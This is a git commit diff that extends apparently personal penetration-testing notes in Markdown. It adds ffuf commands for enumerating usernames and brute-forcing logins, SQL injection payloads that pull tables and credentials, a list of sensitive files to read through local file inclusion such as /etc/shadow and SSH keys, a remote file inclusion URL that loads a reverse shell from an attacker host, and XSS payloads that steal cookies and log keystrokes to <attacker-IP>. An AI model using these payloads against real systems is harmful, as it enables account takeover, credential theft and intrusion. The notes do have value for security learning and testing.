bump

2021-10-13 01:17:44 +02:00 · 2021-10-13 01:17:44 +02:00 · 2c02116916
parent cbfc4137ba
commit 2c02116916
8 changed files with 104 additions and 5 deletions
--- a/enumeration/docs/ffuf.md
+++ b/enumeration/docs/ffuf.md
@ -26,7 +26,15 @@ seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
 ```sh
 ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
 ```
-
+### Fuzz Users and use Bruteforce
+* Fuzz users and write file
+```sh
+ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<targetURL>/customers/signup -mr "username already exists" -o fuff.out
+```
+* Use users saved in `fuff.out` to bruteforce
+```sh
+ffuf -w userlist.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<targetURL>/customers/login -fc 200
+```
 ### Fuzz Subdomains
 ```sh
 ffuf -u http://FUZZ.test.com -c -w  /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
--- a/exploit/sqli/sqli.md
+++ b/exploit/sqli/sqli.md
@ -31,6 +31,16 @@ SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
 SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
 SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
 ```
+* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char.
+```sql
+' UNION SELECT null,null,null where database() like 'da%';-- -
+```
+
+### Time based
+* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes
+```sql
+' union select sleep(3), null; -- -
+```

 ### Blind injection // Guessing characters
 ```sh
@ -70,6 +80,14 @@ http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
 ' UNION SELECT NULL,username,password,NULL FROM users -- //
 ```

+* Retrieve content by union poking the count and order, afterwards extracting tables via
+```sh
+0 union select null, null, database()
+0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
+0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
+0 union select null, null, group_concat(username, ':', password from found_tablename
+```
+
 * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)

 ### Identify Database 
--- a/exploit/web/command_injection.md
+++ b/exploit/web/command_injection.md
@ -0,0 +1,19 @@
+# Command Injection
+
+* Blind injection
+* Verbose injection
+
+## Blind Injection
+* Check via ping, open a `tcpdump` on ICMP to listen for packets
+* Redirect to logfile and read
+* Use `sleep` or `timeout` to check if ci is possible in general
+
+## Functions
+* Watch out for 
+    * `eval()`
+    * `exec()`
+    * `passthru()`
+    * `system()`
+    
+
+
--- a/exploit/web/cookie_tampering.md
+++ b/exploit/web/cookie_tampering.md
@ -0,0 +1 @@
+# Cookie Tampering
--- a/exploit/web/local_file_inclusion.md
+++ b/exploit/web/local_file_inclusion.md
@ -36,3 +36,21 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
 curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
 ```

+## Files of Interest
+* `/etc/issue`
+* `/etc/profile`
+* `/proc/version`
+* `/etc/passwd`
+* `/etc/shadow`
+* `/root/.bash_history`
+* `/var/log/dmessage`
+* `/var/mail/root`
+* `/root/.ssh/id_rsa`
+* `/var/log/apache2/access.log`
+* `C:\boot.ini`
+
+## Tricks
+
+* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
+* Terminate query with `/.`
+* `..//..//..//file`, double slashes
--- a/exploit/web/php/password_reset.md
+++ b/exploit/web/php/password_reset.md
@ -0,0 +1,4 @@
+# Password Reset
+
+* Using a password reset while inserting an email address via GET and POST method.
+* `$_REQUEST` as an array favors POST over GET. So, sending the attacker email address via POST with the GET query parameter.
--- a/exploit/web/remote_file_inclusion.md
+++ b/exploit/web/remote_file_inclusion.md
@ -0,0 +1,9 @@
+# Remote File Inclusion
+
+
+## Usage
+* Use a GET query parameter to include an attacker URL. 
+```sh
+https://test.com/files.php?file=http://<attacker-IP>:<attacker-Port>/reverse_shell.txt
+```
+* Payload may be PHP for example, but should not end in executable file extensions. The payload is executed locally, otherwise.
--- a/exploit/web/xss.md
+++ b/exploit/web/xss.md
@ -2,7 +2,12 @@
 A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.

 ## Stored XSS
-This is where a malicious string originates from the websites database.
+This is where a malicious string originates from the websites database. Such as (stored in a db)
+* User profiles
+* Chats and comments
+* Part of link
+
+* Blind xss is stored inside the app but effects are only visible by proxy, [xsshunter](https://xsshunter.com/).

 ### Examples
 * Sanity test by changing DOM content
@ -12,13 +17,13 @@ This is where a malicious string originates from the websites database.

 * Cookie stealing

-```
+```javascript
 <script>document.location='/log/'+document.cookie</script>
 ```
    * Navigte to `/logs` and take sid

 * Open nc port and collect cookies
-```sh
+```javascript
 <script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
 <script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>

@ -26,6 +31,8 @@ This is where a malicious string originates from the websites database.

 ## Reflected XSS
 In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
+* URL parameters inside GET queries
+* File paths

 ### Usage
 As script inside parameter
@ -36,6 +43,11 @@ http://example.com/search?keyword=<script>...</script>
 ```
 http://example.com/reflected?keyword=<script>alert(window.location.hostname)</script>
 ```
+* Session stealing, base64 encoded
+```javascript
+<script>fetch('http://<attacker-IP>/steal?cookie=' + btoa(document.cookie));</script>
+```
+    * open netcat binder to catch the http queries

 ## DOM based XSS
 With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:
@ -60,7 +72,7 @@ test" onmouseover="alert(document.cookie)"
 ```
 or 
 ```javascript
-<</script>script>alert("1")<</script>/script>
+<</script>script>alert("1");<</script>/script>
 ```
 * `alert()` sanitizing
 ```javascript
@ -101,6 +113,16 @@ or
  }
 </script> 
 ```
+* base64 encoded keylogger
+```javascript
+<script>
+document.onkeypress = function (e) {
+    fetch('http://<attacker-IP>/log?key=' + btoa(e.key) );
+}
+</script>
+```
+## Tricks and Tips
+* Use Polyglots

 ## Protection Methods